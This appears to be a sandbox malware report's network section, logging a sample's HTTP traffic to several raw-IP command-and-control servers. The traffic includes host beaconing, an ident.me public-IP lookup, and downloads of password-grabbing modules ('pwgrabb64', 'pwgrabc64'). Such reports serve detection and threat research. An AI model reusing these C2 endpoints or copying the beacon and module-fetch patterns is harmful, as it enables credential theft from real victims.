Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
ident.me | 176.58.123.25 |
- UDP Requests
-
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:62327 239.255.255.250:1900
-
192.168.56.101:62329 239.255.255.250:3702
-
192.168.56.101:62331 239.255.255.250:3702
-
192.168.56.101:62333 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
GET
200
https://181.129.167.82/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/5/file/
REQUEST
RESPONSE
BODY
GET /rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/5/file/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 181.129.167.82
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Thu, 23 Sep 2021 08:24:05 GMT
Content-Type: application/octet-stream
Content-Length: 224
Connection: keep-alive
GET
200
https://ident.me/
REQUEST
RESPONSE
BODY
GET / HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: ident.me
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 23 Sep 2021 08:24:06 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 15
Connection: keep-alive
Access-Control-Allow-Origin: *
Cache-Control: no-cache, no-store, must-revalidate
GET
200
https://181.129.167.82/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/ZhP7RHTDpJf3xpRdHfhTN/
REQUEST
RESPONSE
BODY
GET /rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/ZhP7RHTDpJf3xpRdHfhTN/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 181.129.167.82
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Thu, 23 Sep 2021 08:24:07 GMT
Content-Type: text/plain
Content-Length: 725
Connection: keep-alive
GET
200
https://181.129.167.82/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
REQUEST
RESPONSE
BODY
GET /rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 181.129.167.82
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Thu, 23 Sep 2021 08:24:08 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://181.129.167.82/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/user/test22/0/
REQUEST
RESPONSE
BODY
GET /rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/user/test22/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 181.129.167.82
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Thu, 23 Sep 2021 08:24:08 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://181.129.167.82/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5CiLogicMonitorUB2IF8%5Cgxinlinelots.pngxp.our/0/
REQUEST
RESPONSE
BODY
GET /rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5CiLogicMonitorUB2IF8%5Cgxinlinelots.pngxp.our/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 181.129.167.82
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Thu, 23 Sep 2021 08:24:09 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://181.129.167.82/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/NAT%20status/client%20is%20behind%20NAT/0/
REQUEST
RESPONSE
BODY
GET /rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 181.129.167.82
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Thu, 23 Sep 2021 08:24:09 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://43.252.158.104/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/5/pwgrabb64/
REQUEST
RESPONSE
BODY
GET /rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/5/pwgrabb64/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 43.252.158.104
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Thu, 23 Sep 2021 08:24:33 GMT
Content-Type: application/octet-stream
Content-Length: 770416
Last-Modified: Mon, 13 Sep 2021 11:57:18 GMT
Connection: keep-alive
ETag: "613f3c9e-bc170"
Accept-Ranges: bytes
GET
200
https://128.201.76.252/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/5/file/
REQUEST
RESPONSE
BODY
GET /rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/5/file/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 128.201.76.252
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Thu, 23 Sep 2021 08:25:30 GMT
Content-Type: application/octet-stream
Content-Length: 224
Connection: keep-alive
GET
200
https://128.201.76.252/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/cN8siDphAP0SDyFMo/
REQUEST
RESPONSE
BODY
GET /rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/cN8siDphAP0SDyFMo/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 128.201.76.252
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Thu, 23 Sep 2021 08:25:31 GMT
Content-Type: text/plain
Content-Length: 721
Connection: keep-alive
GET
200
https://128.201.76.252/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/
REQUEST
RESPONSE
BODY
GET /rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/exc/E:%200xc0000005%20A:%200x00000000771D9A5A/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 128.201.76.252
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Thu, 23 Sep 2021 08:25:32 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://128.201.76.252/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/user/test22/0/
REQUEST
RESPONSE
BODY
GET /rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/user/test22/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 128.201.76.252
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Thu, 23 Sep 2021 08:25:32 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
200
https://128.201.76.252/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/NAT%20status/client%20is%20behind%20NAT/0/
REQUEST
RESPONSE
BODY
GET /rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/14/NAT%20status/client%20is%20behind%20NAT/0/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 128.201.76.252
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Thu, 23 Sep 2021 08:25:33 GMT
Content-Type: text/plain
Content-Length: 3
Connection: keep-alive
GET
403
https://128.201.76.252/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/10/62/TJJNLPBFNNBTXBZBFLF/7/
REQUEST
RESPONSE
BODY
GET /rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/10/62/TJJNLPBFNNBTXBZBFLF/7/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 128.201.76.252
HTTP/1.1 403 Forbidden
Server: nginx/1.14.2
Date: Thu, 23 Sep 2021 08:25:34 GMT
Content-Length: 9
Connection: keep-alive
GET
200
https://105.27.205.34/rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/5/pwgrabc64/
REQUEST
RESPONSE
BODY
GET /rob133/TEST22-PC_W617601.BF759D120BFF7897F580BB7283B7EB7F/5/pwgrabc64/ HTTP/1.1
Connection: Keep-Alive
User-Agent: curl/7.78.0
Host: 105.27.205.34
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 23 Sep 2021 08:25:36 GMT
Content-Type: application/octet-stream
Content-Length: 513392
Last-Modified: Mon, 13 Sep 2021 11:57:21 GMT
Connection: keep-alive
ETag: "613f3ca1-7d570"
Accept-Ranges: bytes
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49203 181.129.167.82:443 |
C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02 |
TLSv1 192.168.56.101:49213 128.201.76.252:443 |
C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | C=AU, ST=Some-State, O=Internet Widgits Pty Ltd | b5:21:a8:16:d5:97:b1:67:f6:60:a5:cb:20:27:76:ec:3c:9d:3b:02 |
TLSv1 192.168.56.101:49204 176.58.123.25:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=ident.me | 4a:7a:fd:e5:e5:1c:ed:4c:db:91:6f:7a:61:c6:35:8a:4a:6d:89:d7 |
TLSv1 192.168.56.101:49206 43.252.158.104:443 |
C=US, ST=IL, O=Internet Widgits Pty Ltd | C=US, ST=IL, O=Internet Widgits Pty Ltd | 92:9c:54:61:4b:3c:f9:b4:92:51:95:d0:aa:d5:6b:b5:51:ab:1d:47 |
TLSv1 192.168.56.101:49214 105.27.205.34:443 |
C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd | C=US, ST=IL, L=Chicago, O=Internet Widgits Pty Ltd | 30:21:9a:cd:06:f2:ba:20:f6:0b:3c:54:ec:08:35:d0:9d:4b:e8:50 |
Snort Alerts
No Snort Alerts